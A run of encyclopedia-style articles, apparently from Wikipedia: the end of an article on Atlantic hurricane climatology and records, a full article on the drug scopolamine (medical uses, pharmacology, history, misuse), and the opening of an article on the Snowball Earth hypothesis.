Emily of 2005 and Hurricane Beryl of 2024, attained Category 5 hurricane status. The easternmost forming storm and longest-lived during July, Hurricane Bertha in 2008, formed at 22.9°W and lasted 17 days. August A decrease in wind shear from July to August contributes to an increase in tropical activity. An average of 2.8 Atlantic tropical storms develop annually in August. On average, four named tropical storms, including one hurricane, occur by August 30, and the first intense hurricane develops by 4 September. September The peak of the hurricane season occurs in September and corresponds with low wind shear and the warmest sea surface temperatures. The month of September sees an average of 3 storms a year. By September 24, the average Atlantic season features 7 named tropical storms, including 4 hurricanes. In addition, two major hurricanes occur on average by 28 September. Relatively few tropical cyclones make landfall at these intensities. October The favorable conditions found during September begin to decay in October. The main reason for the decrease in activity is increasing wind shear, although sea surface temperatures are also cooler than in September. In October, only 1.8 cyclones develop on average, despite a climatological secondary peak around 20 October. By 21 October, the average season features 9 named storms with 5 hurricanes. A third major hurricane occurs after September 28 in half of all Atlantic tropical cyclone seasons. In contrast to mid-season activity, the mean locus of formation shifts westward to the Caribbean and Gulf of Mexico, reversing the eastward progression of June through August. November Wind shear from the westerlies increases throughout November, generally preventing cyclone formation. On average, one tropical storm forms during every other November. On rare occasions, a major hurricane occurs. The few intense hurricanes in November include the Cuba hurricane in late October and early November 1932 (the strongest November hurricane on record, peaking as a Category 5 hurricane), Hurricane Lenny in mid-November 1999, and Hurricane Kate in late November 1985, which was the latest major hurricane formation on record until Hurricane Otto (a category 3 storm) in the 2016 hurricane season. Hurricane Paloma was a Category 4 storm that made landfall in Cuba in early November 2008. Hurricane Eta strengthened into a Category 4 hurricane in early November 2020, becoming the third most intense tropical cyclone in November, and made landfall in Central America. In that same year, Hurricane Iota strengthened into a Category 4 hurricane on November 16, becoming the second most intense hurricane in November. December to May Although the hurricane season is defined as beginning on June 1 and ending on November 30, tropical cyclones have formed in every month of the year. Since 1870, there have been 32 off-season cyclones, 18 of which occurred in May. In the same period, nine storms formed in December, three in April, and one each in January, February, and March. During four years (1887, 1953, 2003, and 2007), tropical cyclones formed in the North Atlantic Ocean both during or before May and during December. 1887 holds the record for being the year with the most storms outside the hurricane season, with four off-season storms having occurred during it. However, high vertical wind shear and low sea surface temperatures generally preclude tropical cyclone formation during the off-season. Among the tropical cyclones that formed in December, the lifespan of two continued into January of the following calendar year: Hurricane Alice in 1954–55, and Tropical Storm Zeta in 2005–06. Seven tropical or subtropical cyclones formed in January, two of which became Category 1 hurricanes: the first storm of 1938, and Hurricane Alex in 2016. No major hurricanes have occurred in the off-season. Extremes The season in which the most tropical storms formed on record is the 2020 Atlantic hurricane season, which produced 30 storms. However, 2005 was the one in which the most hurricanes formed on record (15). The 2005 Atlantic hurricane season had the most major hurricanes on record (7), also tied with 2020. The 1950 Atlantic hurricane season and 1961 Atlantic hurricane season were once thought to have 8 and 7 respectively, but re-analysis showed that several storms during both seasons were weaker than thought, and thus the records are now held by the 2005 and 2020 seasons. Some storms in 2005 were Hurricane Katrina and Hurricane Wilma. The least active season on record since 1946 (when the database is considered more reliable) was the 1983 Atlantic hurricane season, with four tropical storms, two hurricanes, and one major hurricane. Overall, the 1914 Atlantic hurricane season remains the least active, with only one documented storm. The most intense hurricane (by barometric pressure) on record in the North Atlantic basin was Hurricane Wilma (2005) (882 mbar). The largest hurricane (in gale diameter winds) on record to form in the North Atlantic was Hurricane Sandy (2012) with a gale diameter of . The longest-lasting hurricane was the 1899 San Ciriaco hurricane, which lasted for 27 days and 18 hours as a tropical cyclone. The most tornadoes spawned by a hurricane were 127 created by Hurricane Ivan (2004 season). The strongest hurricane to reach land was the Labor Day Hurricane of 1935 (892 hPa). The deadliest hurricane was the Great Hurricane of 1780 (22,000 fatalities). The deadliest hurricane to make landfall on the continental United States was the Galveston Hurricane in 1900, which may have killed up to 12,000 people. The most damaging hurricanes were Hurricane Katrina and Hurricane Harvey of the 2005 and 2017 seasons, respectively; both caused $125 billion in damages in their respective years. However, when adjusted for inflation, Katrina is the costliest, with $161 billion in damages. The quickest-forming hurricane was Hurricane Humberto in 2007. It was a small hurricane that formed and intensified faster than any other tropical cyclone on record before landfall. Developing on September 12, 2007, in the northwestern Gulf of Mexico, the cyclone strengthened and struck High Island, Texas, with winds of about early on September 13. Trends Paleoclimatology and historical trends Proxy records based on paleotempestological research have revealed that major hurricane activity along the Gulf Coast varies on timescales of centuries to millennia. A few major hurricanes struck the Gulf Coast during 3000–1400 BC and during the most recent millennium. These quiescent intervals were separated by a hyperactive period between 1400 BC and 1000 AD, when the Gulf coast was struck frequently by hurricanes; their landfall probabilities increased by 3–5 times. This millennial-scale variability has been attributed to long-term shifts in the position of the Azores High, which may also be linked to changes in the strength of the North Atlantic Oscillation. According to the Azores High hypothesis, an anti-phase pattern is expected to exist between the Gulf Coast and the Atlantic coast. During the quiescent periods, a more northeasterly position of the Azores High would result in more hurricanes being steered towards the Atlantic coast. During the hyperactive period, more hurricanes were steered towards the Gulf coast, as the Azores High was shifted to a more southwesterly position near the Caribbean. Such a displacement of the Azores High is consistent with paleoclimatic evidence that shows an abrupt onset of a drier climate in Haiti around 3200 14C years BP, and a change towards more humid conditions in the Great Plains during the late-Holocene as more moisture was pumped up the Mississippi Valley through the Gulf coast. Preliminary data from the northern Atlantic coast seem to support the Azores High hypothesis. A 3,000-year proxy record from a coastal lake in Cape Cod suggests that hurricane activity increased significantly during the past 500–1000 years, just as the Gulf Coast was amid a quiescent period during the last millennium. Evidence also shows that the average latitude of hurricane impacts has been steadily shifting northward towards the Eastern Seaboard over the past few centuries. This change has been sped up in modern times due to the Arctic Ocean heating up, especially from fossil fuel-caused climate change. The number and strength of Atlantic hurricanes may undergo a 50–70 year cycle known as the Atlantic Multidecadal Oscillation. Nyberg et al. reconstructed Atlantic major hurricane activity back to the early eighteenth century and found five periods averaging 3–5 major hurricanes per year and lasting 40–60 years, and six others averaging 1.5–2.5 major hurricanes per year and lasting 10–20 years. These periods are associated with the Atlantic multidecadal oscillation. Throughout the periods, a decadal oscillation related to solar irradiance was responsible for enhancing or dampening the number of major hurricanes by 1–2 per year. Climate change Between 1979 and 2019, the intensity of tropical cyclones increased; globally, tropical cyclones are 8% more likely to reach major intensities (Saffir–Simpson Categories 3 to 5). This trend is particularly strong in the North Atlantic, where the probability of cyclones reaching Category 3 or higher increased by 49% per decade. This is consistent with the theoretical understanding of the link between climate change and tropical cyclones and model studies. While the number of storms in the Atlantic has increased since 1995, there is no obvious global trend. The annual number of tropical cyclones worldwide remains about 87 ± 10. However, the ability of climatologists to make long-term data analyses in certain basins is limited by the lack of reliable historical data in some basins, primarily in the Southern Hemisphere. It has been observed that a poleward migration exists for the paths of maximum intensity of tropical cyclone activity in the Atlantic, as shown by research on the latitudes at which recent tropical cyclones in the Atlantic are reaching maximum intensity. The data indicates that during the past thirty years, the peak intensity of these storms has shifted poleward in both hemispheres at a rate of approximately 60 km per decade, amounting to approximately one degree of latitude per decade. Impact Atlantic storms are becoming more financially destructive, since five of the ten most expensive storms in United States history have occurred since 1990. According to the World Meteorological Organization, a "recent increase in societal impact from tropical cyclones has largely been caused by rising concentrations of population and infrastructure in coastal regions." Pielke et al. (2008) normalized mainland U.S. hurricane damage from 1900–2005 to 2005 values and found no remaining trend of increasing absolute damage. The 1970s and 1980s had low amounts of damage compared to other decades. The decade 1996–2005 has the second most damage among the past 11 decades, with only the decade of 1926–1935 surpassing its costs. The most damaging single storm is the 1926 Miami hurricane, with $157 billion of normalized damage. Partially because of the threat of hurricanes, some coastal regions had sparse populations between major ports until the advent of automobile tourism; therefore, the most severe portions of hurricanes striking the coast may have gone unmeasured in some instances. The combined effects of ship destruction and remote landfall limit the number of intense hurricanes in the official record before the era of hurricane reconnaissance aircraft and satellite meteorology. However, the record shows a distinct increase in the number and strength of intense hurricanes; therefore, experts regard the early data as suspect. Christopher Landsea et al. estimated an undercount bias of zero to six tropical cyclones per year between 1851 and 1885 and zero to four per year between 1886 and 1910. These undercounts roughly take into account the typical size of tropical cyclones, the density of shipping tracks over the Atlantic basin, and the amount of populated coastline. Few above-normal hurricane seasons occurred from 1970 to 1994, and even less have occurred since 1995. Destructive hurricanes struck frequently from 1926 to 1960, especially in New England. In 1933, twenty-one Atlantic tropical storms formed; the only years with more of them were 2005 and 2020, which saw 28 and 30 storms, respectively. Tropical hurricanes occurred infrequently during the seasons of 1900–25; however, many intense storms formed during 1870–99. During the 1887 season, 19 tropical storms formed, of which a record 4 occurred after November 1; 11 of the storms strengthened into hurricanes. Few hurricanes occurred from the 1840s to 1860s; however, many struck in the early 19th century, including an 1821 storm that made landfall over New York City. Some historical weather experts say these storms may have been as high as Category 4 in strength. These active hurricane seasons predated satellite coverage of the Atlantic basin. Before the satellite era began in 1960, tropical storms or hurricanes went undetected, unless a reconnaissance aircraft encountered one, a ship reported a voyage through the storm, or a storm landed in a populated area. The official record, therefore, may lack mentions of storms in which no ship experienced gale-force winds, recognized it as a tropical storm (as opposed to a high-latitude extra-tropical cyclone, a tropical wave, or a brief squall), returned to port, and reported the experience.
Physical sciences
Storms
Earth science
28979
https://en.wikipedia.org/wiki/Scopolamine
Scopolamine
Scopolamine, also known as hyoscine, or Devil's Breath, is a natural or synthetically produced tropane alkaloid and anticholinergic drug that is used as a medication to treat motion sickness and postoperative nausea and vomiting. It is also sometimes used before surgery to decrease saliva. When used by injection, effects begin after about 20 minutes and last for up to 8 hours. It may also be used orally and as a transdermal patch since it has been long known to have transdermal bioavailability. Scopolamine is in the antimuscarinic family of drugs and works by blocking some of the effects of acetylcholine within the nervous system. Scopolamine was first written about in 1881 and started to be used for anesthesia around 1900. Scopolamine is also the main active component produced by certain plants of the nightshade family, which historically have been used as psychoactive drugs, known as deliriants, due to their antimuscarinic-induced hallucinogenic effects in higher doses. In these contexts, its mind-altering effects have been utilized for recreational and occult purposes. The name "scopolamine" is derived from one type of nightshade known as Scopolia, while the name "hyoscine" is derived from another type known as Hyoscyamus niger, or black henbane. It is on the World Health Organization's List of Essential Medicines. Medical uses Scopolamine has a number of formal uses in modern medicine where it is used in its isolated form and in low doses to treat: Postoperative nausea and vomiting Motion sickness, including sea sickness, leading to its use by scuba divers (where it is often applied as a transdermal patch behind the ear) Gastrointestinal spasms Renal or biliary spasms Aid in gastrointestinal radiology and endoscopy Irritable bowel syndrome Clozapine-induced drooling Bowel colic Eye inflammation It is sometimes used as a premedication, especially to reduce respiratory tract secretions in surgery, most commonly by injection. Common side effects include sleepiness, blurred vision, dilated pupils, and dry mouth. It is not recommended in people with angle-closure glaucoma or bowel obstruction. Whether its use during pregnancy is safe remains unclear, and use during breastfeeding is still cautioned by health professionals and manufacturers of the drug. Breastfeeding Scopolamine enters breast milk by secretion. Although no human studies exist to document the safety of scopolamine while nursing, the manufacturer recommends that caution be taken if scopolamine is administered to a breastfeeding woman. Adverse effects Adverse effect incidence: Uncommon (0.1–1% incidence) adverse effects include: Dry mouth Anhidrosis (reduced ability to sweat to cool off) Tachycardia (usually occurs at higher doses and is succeeded by bradycardia) Bradycardia Urticaria (hives) Pruritus (itching) Rare (<0.1% incidence) adverse effects include: Constipation Urinary retention Hallucinations Agitation Confusion Restlessness Seizures Unknown frequency adverse effects include: Anaphylactic shock or reactions Dyspnea (shortness of breath) Rash Erythema Other hypersensitivity reactions Blurred vision Mydriasis (dilated pupils) Drowsiness Dizziness Somnolence Overdose Physostigmine, a cholinergic drug that readily crosses the blood–brain barrier, has been used as an antidote to treat the central nervous system depression symptoms of a scopolamine overdose. Other than this supportive treatment, gastric lavage and induced emesis (vomiting) are usually recommended as treatments for oral overdoses. The symptoms of overdose include: Tachycardia Arrhythmia Blurred vision Photophobia Urinary retention Drowsiness or paradoxical reaction, which can present with hallucinations Cheyne–Stokes respiration Dry mouth Skin reddening Inhibition of gastrointestinal motility Route of administration Scopolamine can be taken by mouth, subcutaneously, in the eye, and intravenously, as well as via a transdermal patch. Pharmacology Pharmacodynamics The pharmacological effects of scopolamine are mediated through the drug's competitive antagonism of the peripheral and central muscarinic acetylcholine receptors. Scopolamine acts as a nonspecific muscarinic antagonist at all four (M1, M2, M3, and M4) receptor sites. In doses higher than intended for medicinal use, the hallucinogenic alteration of consciousness, as well as the deliriousness in particular, are tied to the compound's activity at the M1 muscarinic receptor. M1 receptors are located primarily in the central nervous system and are involved in perception, attention, and cognitive functioning. Delirium is only associated with the antagonism of postsynaptic M1 receptors and currently other receptor subtypes have not been implicated. Peripheral muscarinic receptors are part of the autonomic nervous system. M2 receptors are located in the brain and heart, M3 receptors are in salivary glands and M4 receptors are in the brain and lungs. Due to the drug's inhibition of various signal transduction pathways, the decrease in acetylcholine signaling is what leads to many of the cognitive deficits, mental impairments, and delirium associated with psychoactive doses. Medicinal effects appear to mostly be tied to activation of the peripheral receptors and only from marginal decreases in acetylcholine signaling. Although often broadly referred to as simply being 'anticholinergic', antimuscarinic would be more specific and accurate terminology to use for scopolamine, as, for example, it is not known to block nicotinic receptors. Pharmacokinetics Scopolamine undergoes first-pass metabolism and about 2.6% is excreted unchanged in urine. It has a bioavailability of 20-40%, reaches peak plasma concentration in about 45 minutes, and in healthy subjects has an average half-life of 5 hours (observed range 2 - 10 hours). Scopolamine is primarily metabolized by the CYP3A4 enzyme, and Grapefruit juice decreases metabolism of scopolamine, consequently increasing plasma concentration. Chemistry Biosynthesis in plants Scopolamine is among the secondary metabolites of plants from Solanaceae (nightshade) family of plants, such as henbane (Hyoscyamus niger), jimson weed (Datura), angel's trumpets (Brugmansia), deadly nightshade (Belladonna), mandrake (Mandragora officinarum), and corkwood (Duboisia). The biosynthesis of scopolamine begins with the decarboxylation of L-ornithine to putrescine by ornithine decarboxylase. Putrescine is methylated to N-methylputrescine by putrescine N-methyltransferase. A putrescine oxidase that specifically recognizes methylated putrescine catalyzes the deamination of this compound to 4-methylaminobutanal, which then undergoes a spontaneous ring formation to N-methyl-pyrrolium cation. In the next step, the pyrrolium cation condenses with acetoacetic acid yielding hygrine. No enzymatic activity could be demonstrated to catalyze this reaction. Hygrine further rearranges to tropinone. Subsequently, tropinone reductase I converts tropinone to tropine, which condenses with phenylalanine-derived phenyllactate to littorine. A cytochrome P450 classified as Cyp80F1 oxidizes and rearranges littorine to hyoscyamine aldehyde. In the final step, hyoscyamine undergoes epoxidation catalyzed by 6beta-hydroxyhyoscyamine epoxidase yielding scopolamine. History Plants naturally containing scopolamine such as Atropa belladonna (deadly nightshade), Brugmansia (angels trumpet), Datura (Jimson weed), Hyoscyamus niger, Mandragora officinarum, Scopolia carniolica, Latua and Duboisia myoporoides have been known about and used for various purposes in both the New and Old Worlds since ancient times. Being one of the earlier alkaloids isolated from plant sources, scopolamine has been in use in its purified forms, such as various salts, including hydrochloride, hydrobromide, hydroiodide, and sulfate, since its official isolation by the German scientist Albert Ladenburg in 1880, and as various preparations from its plant-based form since antiquity and perhaps prehistoric times. In 1899, Dr. Schneiderlin recommended the use of scopolamine and morphine for surgical anaesthesia, and it started to be used sporadically for that purpose. The use of this combination in obstetric anesthesiology (childbirth) was first proposed by Richard von Steinbuchel in 1902 and was picked up and further developed by Carl Gauss in Freiburg, Germany, starting in 1903. The method, which was based on a drug synergy between both scopolamine and morphine came to be known as Dämmerschlaf ("twilight sleep") or the "Freiburg method". It spread rather slowly, and different clinics experimented with different dosages and ingredients. In 1915, the Canadian Medical Association Journal reported, "the method [was] really still in a state of development". It remained widely used in the US until the 1960s, when growing chemophobia and a desire for more natural childbirth led to its abandonment. Society and culture Names Hyoscine hydrobromide is the international nonproprietary name, and scopolamine hydrobromide is the United States Adopted Name. Other names include levo-duboisine, devil's breath, and burundanga. Australian bush medicine A bush medicine developed by Aboriginal peoples of the eastern states of Australia from the soft corkwood tree (Duboisia myoporoides) was used by the Allies in World War II to stop soldiers from getting seasick when they sailed across the English Channel on their way to France during the Invasion of Normandy. Later, the same substance was found to be usable in the production of scopolamine and hyoscyamine, which are used in eye surgery, and a multimillion-dollar industry was built in Queensland based on this substance. Recreational and religious use While it has been occasionally used recreationally for its hallucinogenic properties, the experiences are often unpleasant, mentally and physically. It is also physically dangerous and officially classified as a deliriant drug, so repeated recreational use is rare. In June 2008, more than 20 people were hospitalized with psychosis in Norway after ingesting counterfeit rohypnol tablets containing scopolamine. In January 2018, 9 individuals were hospitalized in Perth, Western Australia, after reportedly ingesting scopolamine. The alkaloid scopolamine, when taken recreationally for its psychoactive effect, is usually taken in the form of preparations from plants of the genera Datura or Brugmansia, often by adolescents or young adults in order to achieve hallucinations and an altered state of consciousness induced by muscarinic antagonism. In circumstances such as these, the intoxication is usually built on a synergistic, but even more toxic mixture of the additional alkaloids in the plants which includes atropine and hyoscyamine. Historically, the various plants that produce scopolamine have been used psychoactively for spiritual and magical purposes, particularly by witches in western culture and indigenous groups throughout the Americas, such as Native American tribes like the Chumash. When entheogenic preparations of these plants were used, scopolamine was considered to be the main psychoactive compound and was largely responsible for the hallucinogenic effects, particularly when the preparation was made into a topical ointment, most notably flying ointment. Scopolamine is reported to be the only active alkaloid within these plants that can effectively be absorbed through the skin to cause effects. Different recipes for these ointments were explored in European witchcraft at least as far back as the Early Modern period and included multiple ingredients to help with the transdermal absorption of scopolamine, such as animal fat, as well as other possible ingredients to counteract its noxious and dysphoric effects. In the Bible, there are multiple mentions of Mandrake, a psychoactive and hallucinogenic plant root that contains scopolamine. It was associated with fertility and (sexual) desire for which it was yearned by Rachel, who was "barren" (infertile) but trying to conceive. Interrogation The effects of scopolamine were studied for use as a truth serum in interrogations in the early 20th century, but because of the side effects, investigations were dropped. In 2009, the Czechoslovak state security secret police were proven to have used scopolamine at least three times to obtain confessions from alleged antistate dissidents. Use in crime Ingestion of scopolamine can render a victim unconscious for 24 hours or more. In large doses, it can cause respiratory failure and death. The most common seems to be recorded in Colombia, where unofficial estimates put the number of annual scopolamine incidents at approximately 50,000. A travel advisory published by the U.S. Overseas Security Advisory Council (OSAC) in 2012 stated: Between 1998 and 2004, 13% of emergency-room admissions for "poisoning with criminal intentions" in a clinic of Bogotá have been attributed to scopolamine, and 44% to benzodiazepines. Most commonly, the person has been poisoned by a robber who gave the victim a scopolamine-laced beverage, in the hope that the victim would become unconscious or unable to effectively resist the robbery. Beside robberies, it is also allegedly involved in express kidnappings and sexual assault. In 2008, the Hospital Clínic in Barcelona introduced a protocol to help medical workers identify cases. In February 2015, Madrid hospitals adopted a similar working document. Hospital Clínic has found little scientific evidence to support this use and relies on the victims' stories to reach any conclusion. Although poisoning by scopolamine appears quite often in the media as an aid for raping, kidnapping, killing, or robbery, the effects of this drug and the way it is applied by criminals (transdermal injection, on playing cards and papers, etc.) are often exaggerated, especially skin exposure, as the dose that can be absorbed by the skin is too low to have any effect. Scopolamine transdermal patches must be used for hours to days. There are certain other aspects of the usage of scopolamine in crimes. Powdered scopolamine is referred to as "devil's breath". In popular media and television, it is portrayed as a method to brainwash or control people into being defrauded by their attackers. There is debate whether these claims are true. Research Scopolamine is used as a research tool to study memory encoding. Initially, in human trials, relatively low doses of the muscarinic receptor antagonist scopolamine were found to induce temporary cognitive defects. Since then, scopolamine has become a standard drug for experimentally inducing cognitive defects in animals. Results in primates suggest that acetylcholine is involved in the encoding of new information into long-term memory. Scopolamine has been shown to exert a greater impairment on episodic memory, event-related potentials, memory retention and free recall compared to diphenhydramine (an anticholinergic and antihistamine). Scopolamine produces detrimental effects on short-term memory, memory acquisition, learning, visual recognition memory, visuospatial praxis, visuospatial memory, visuoperceptual function, verbal recall, and psychomotor speed. It does not seem to impair recognition and memory retrieval, though. Acetylcholine projections in hippocampal neurons, which are vital in mediating long-term potentiation, are inhibited by scopolamine. Scopolamine inhibits cholinergic-mediated glutamate release in hippocampal neurons, which assist in depolarization, potentiation of action potential, and synaptic suppression. Scopolamine's effects on acetylcholine and glutamate release in the hippocampus favor retrieval-dominant cognitive functioning. Scopolamine has been used to model the defects in cholinergic function for models of Alzheimer's, dementia, fragile X syndrome, and Down syndrome. Scopolamine has been identified as a psychoplastogen, which refers to a compound capable of promoting rapid and sustained neuroplasticity in a single dose. It has been and continues to be investigated as a rapid-onset antidepressant, with many small studies finding positive results, particularly in female subjects. NASA agreed to develop a nasal administration method. With a precise dosage, the NASA spray formulation has been shown to work faster and more reliably than the oral form to treat motion sickness. Although a fair amount of research has been applied to scopolamine in the field of medicine, its hallucinogenic (psychoactive) effects as well as the psychoactive effects of other antimuscarinic deliriants haven't been extensively researched or as well understood compared to other types of hallucinogens such as psychedelic and dissociative compounds, despite the alkaloid's long history of usage in mind-altering plant preparations.
Physical sciences
Alkaloids
Chemistry
28982
https://en.wikipedia.org/wiki/Snowball%20Earth
Snowball Earth
The Snowball Earth is a geohistorical hypothesis that proposes that during one or more of Earth's icehouse climates, the planet's surface became nearly entirely frozen with no liquid oceanic or surface water exposed to the atmosphere. The most academically mentioned period of such a global ice age is believed to have occurred some time before 650 mya during the Cryogenian period, which included at least two large glacial periods, the Sturtian and Marinoan glaciations. Proponents of the hypothesis argue that it best explains sedimentary deposits that are generally believed to be of glacial origin at tropical palaeolatitudes and other enigmatic features in the geological record. Opponents of the hypothesis contest the geological evidence for global glaciation and the geophysical feasibility of an ice- or slush-covered ocean, and they emphasize the difficulty of escaping an all-frozen condition. Several unanswered questions remain, including whether Earth was a full "snowball" or a "slushball" with a thin equatorial band of open (or seasonally open) water. The Snowball Earth episodes are proposed to have occurred before the sudden radiations of multicellular bioforms known as the Avalon and Cambrian explosions; the most recent Snowball episode may have triggered the evolution of multicellularity. History First evidence for ancient glaciation Long before the idea of a global glaciation was first proposed, a series of discoveries occurred that accumulated evidence for ancient Precambrian glaciations. The first of these discoveries was published in 1871 by J. Thomson, who found ancient glacier-reworked material (tillite) in Islay, Scotland. Similar findings followed in Australia (1884) and India (1887). A fourth and very illustrative finding, which came to be known as "Reusch's Moraine," was reported by Hans Reusch in northern Norway in 1891. Many other findings followed, but their understanding was hampered by the rejection (at the time) of continental drift. Global glaciation proposed Douglas Mawson, an Australian geologist and Antarctic explorer, spent much of his career studying the stratigraphy of the Neoproterozoic in South Australia, where he identified thick and extensive glacial sediments. As a result, late in his career, he speculated about the possibility of global glaciation. Mawson's ideas of global glaciation, however, were based on the mistaken assumption that the geographic position of Australia, and those of other continents where low-latitude glacial deposits are found, have remained constant through time. With the advancement of the continental drift hypothesis, and eventually plate tectonic theory, came an easier explanation for the glaciogenic sediments—they were deposited at a time when the continents were at higher latitudes. In 1964, the idea of global-scale glaciation reemerged when W. Brian Harland published a paper in which he presented palaeomagnetic data showing that glacial tillites in Svalbard and Greenland were deposited at tropical latitudes. From this data and the sedimentological evidence that the glacial sediments interrupt successions of rocks commonly associated with tropical to temperate latitudes, he argued that an ice age occurred that was so extreme that it resulted in marine glacial rocks being deposited in the tropics. In the 1960s, Mikhail Budyko, a Soviet climatologist, developed a simple energy-balance climate model to investigate the effect of ice cover on global climate. Using this model, Budyko found that if ice sheets advanced far enough out of the polar regions, a feedback loop ensued where the increased reflectiveness (albedo) of the ice led to further cooling and the formation of more ice, until the entire Earth was covered in ice and stabilized in a new ice-covered equilibrium. While Budyko's model showed that this ice-albedo stability could happen, he concluded that it had, in fact, never happened, as his model offered no way to escape from such a feedback loop. In 1971, Aron Faegre, an American physicist, showed that a similar energy-balance model predicted three stable global climates, one of which was snowball Earth. This model introduced Edward Norton Lorenz's concept of intransitivity, indicating that there could be a major jump from one climate to another, including to snowball Earth. The term "snowball Earth" was coined by Joseph Kirschvink in a short paper published in 1992 within a lengthy volume concerning the biology of the Proterozoic eon. The major contributions from this work were: (1) the recognition that the presence of banded iron formations is consistent with such a global glacial episode, and (2) the introduction of a mechanism by which to escape from a completely ice-covered Earth—specifically, the accumulation of CO2 from volcanic outgassing leading to an ultra-greenhouse effect. Franklyn Van Houten's discovery of a consistent geological pattern in which lake levels rose and fell is now known as the "Van Houten cycle". His studies of phosphorus deposits and banded iron formations in sedimentary rocks made him an early adherent of the snowball Earth hypothesis postulating that the planet's surface froze more than 650 Ma. Interest in the notion of a snowball Earth increased dramatically after Paul F. Hoffman and his co-workers applied Kirschvink's ideas to a succession of Neoproterozoic sedimentary rocks in Namibia and elaborated upon the hypothesis in the journal Science in 1998 by incorporating such observations as the occurrence of cap carbonates. In 2010, Francis A. Macdonald, assistant professor at Harvard in the Department of Earth and Planetary Sciences, and others, reported evidence that Rodinia was at equatorial latitude during the Cryogenian period with glacial ice at or below sea level, and that the associated Sturtian glaciation was global. Evidence The snowball Earth hypothesis was originally devised to explain geological evidence for the apparent presence of glaciers at tropical latitudes. According to modelling, an ice–albedo feedback would result in glacial ice rapidly advancing to the equator once the glaciers spread to within 25° to 30° of the equator. Therefore, the presence of glacial deposits within the tropics suggests global ice cover. Critical to an assessment of the validity of the theory, therefore, is an understanding of the reliability and significance of the evidence that led to the belief that ice ever reached the tropics. This evidence must prove three things: that a bed contains sedimentary structures that could have been created only by glacial activity; that the bed lay within the tropics when it was deposited. that glaciers were active at different global locations at the same time, and that no other deposits of the same age are in existence. This last point is very difficult to prove. Before the Ediacaran, the biostratigraphic markers usually used to correlate rocks are absent; therefore there is no way to prove that rocks in different places across the globe were deposited at the same time. The best that can be done is to estimate the age of the rocks using radiometric methods, which are rarely accurate to better than a million years or so. The first two points are often the source of contention on a case-to-case basis. Many glacial features can also be created by non-glacial means, and estimating the approximate latitudes of landmasses even as recently as 200 Ma can be riddled with difficulties. Palaeomagnetism The snowball Earth hypothesis was first posited to explain what were then considered to be glacial deposits near the equator. Since tectonic plates move slowly over time, ascertaining their position at a given point in Earth's long history is not easy. In addition to considerations of how the recognizable landmasses could have fit together, the latitude at which a rock was deposited can be constrained by palaeomagnetism. When sedimentary rocks form, magnetic minerals within them tend to align with Earth's magnetic field. Through the precise measurement of this palaeomagnetism, it is possible to estimate the latitude (but not the longitude) where the rock matrix was formed. Palaeomagnetic measurements have indicated that some sediments of glacial origin in the Neoproterozoic rock record were deposited within 10 degrees of the equator, although the accuracy of this reconstruction is in question. This palaeomagnetic location of apparently glacial sediments (such as dropstones) has been taken to suggest that glaciers extended from land to sea level in tropical latitudes at the time the sediments were deposited. It is not clear whether this implies a global glaciation or the existence of localized, possibly land-locked, glacial regimes. Others have even suggested that most data do not constrain any glacial deposits to within 25° of the equator. Skeptics suggest that the palaeomagnetic data could be corrupted if Earth's ancient magnetic field was substantially different from today's. Depending on the rate of cooling of Earth's core, it is possible that during the Proterozoic, the magnetic field did not approximate a simple dipolar distribution, with north and south magnetic poles roughly aligning with the planet's axis as they do today. Instead, a hotter core may have circulated more vigorously and given rise to 4, 8 or more poles. Palaeomagnetic data would then have to be re-interpreted, as the sedimentary minerals could have aligned pointing to a "west pole" rather than the north magnetic pole. Alternatively, Earth's dipolar field could have been oriented such that the poles were close to the equator. This hypothesis has been posited to explain the extraordinarily rapid motion of the magnetic poles implied by the Ediacaran palaeomagnetic record; the alleged motion of the north magnetic pole would occur around the same time as the Gaskiers glaciation. Another weakness of reliance on palaeomagnetic data is the difficulty in determining whether the magnetic signal recorded is original, or whether it has been reset by later activity. For example, a mountain-building orogeny releases hot water as a by-product of metamorphic reactions; this water can circulate to rocks thousands of kilometers away and reset their magnetic signature. This makes the authenticity of rocks older than a few million years difficult to determine without painstaking mineralogical observations. Moreover, further evidence is accumulating that large-scale remagnetization events have taken place which may necessitate revision of the estimated positions of the palaeomagnetic poles. There is currently only one deposit, the Elatina deposit of Australia, that was indubitably deposited at low latitudes; its depositional date is well-constrained, and the signal is demonstrably original. Low-latitude glacial deposits Sedimentary rocks that are deposited by glaciers have distinctive features that enable their identification. Long before the advent of the snowball Earth hypothesis, many Neoproterozoic sediments had been interpreted as having a glacial origin, including some apparently at tropical latitudes at the time of their deposition. However, many sedimentary features traditionally associated with glaciers can also be formed by other means. Thus the glacial origin of many of the key occurrences for snowball Earth has been contested. As of 2007, there was only one "very reliable"—still challenged—datum point identifying tropical tillites, which makes statements of equatorial ice cover somewhat presumptuous. However, evidence of sea-level glaciation in the tropics during the Sturtian glaciation is accumulating. Evidence of possible glacial origin of sediment includes: Dropstones (stones dropped into marine sediments), which can be deposited by glaciers or other phenomena. Varves (annual sediment layers in periglacial lakes), which can form at higher temperatures. Glacial striations (formed by embedded rocks scraped against bedrock): similar striations are from time to time formed by mudflows or tectonic movements. Diamictites (poorly sorted conglomerates). Originally described as glacial till, most were in fact formed by debris flows. Open-water deposits It appears that some deposits formed during the snowball period could only have formed in the presence of an active hydrological cycle. Bands of glacial deposits up to 5,500 meters thick, separated by small (meters) bands of non-glacial sediments, demonstrate that glaciers melted and re-formed repeatedly for tens of millions of years; solid oceans would not permit this scale of deposition. It is considered possible that ice streams such as seen in Antarctica today could have caused these sequences. Further, sedimentary features that could only form in open water (for example: wave-formed ripples, far-traveled ice-rafted debris and indicators of photosynthetic activity) can be found throughout sediments dating from the snowball-Earth periods. While these may represent "oases" of meltwater on a completely frozen Earth, computer modelling suggests that large areas of the ocean must have remained ice-free, arguing that a "hard" snowball is not plausible in terms of energy balance and general circulation models. Carbon isotope ratios There are two stable isotopes of carbon in sea water: carbon-12 (12C) and the rare carbon-13 (13C), which makes up about 1.109 percent of carbon atoms. Biochemical processes, of which photosynthesis is one, tend to preferentially incorporate the lighter 12C isotope. Thus ocean-dwelling photosynthesizers, both protists and algae, tend to be very slightly depleted in 13C, relative to the abundance found in the primary volcanic sources of Earth's carbon. Therefore, an ocean with photosynthetic life will have a lower 13C/12C ratio within organic remains and a higher ratio in corresponding ocean water. The organic component of the lithified sediments will remain very slightly, but measurably, depleted in 13C. Silicate weathering, an inorganic process by which carbon dioxide is drawn out of the atmosphere and deposited in rock, also fractionates carbon. The emplacement of several large igneous provinces shortly before the Cryogenian and the subsequent chemical weathering of the enormous continental flood basalts created by them, aided by the breakup of Rodinia that exposed many of these flood basalts to warmer, moister conditions closer to the coast and accelerated chemical weathering, is 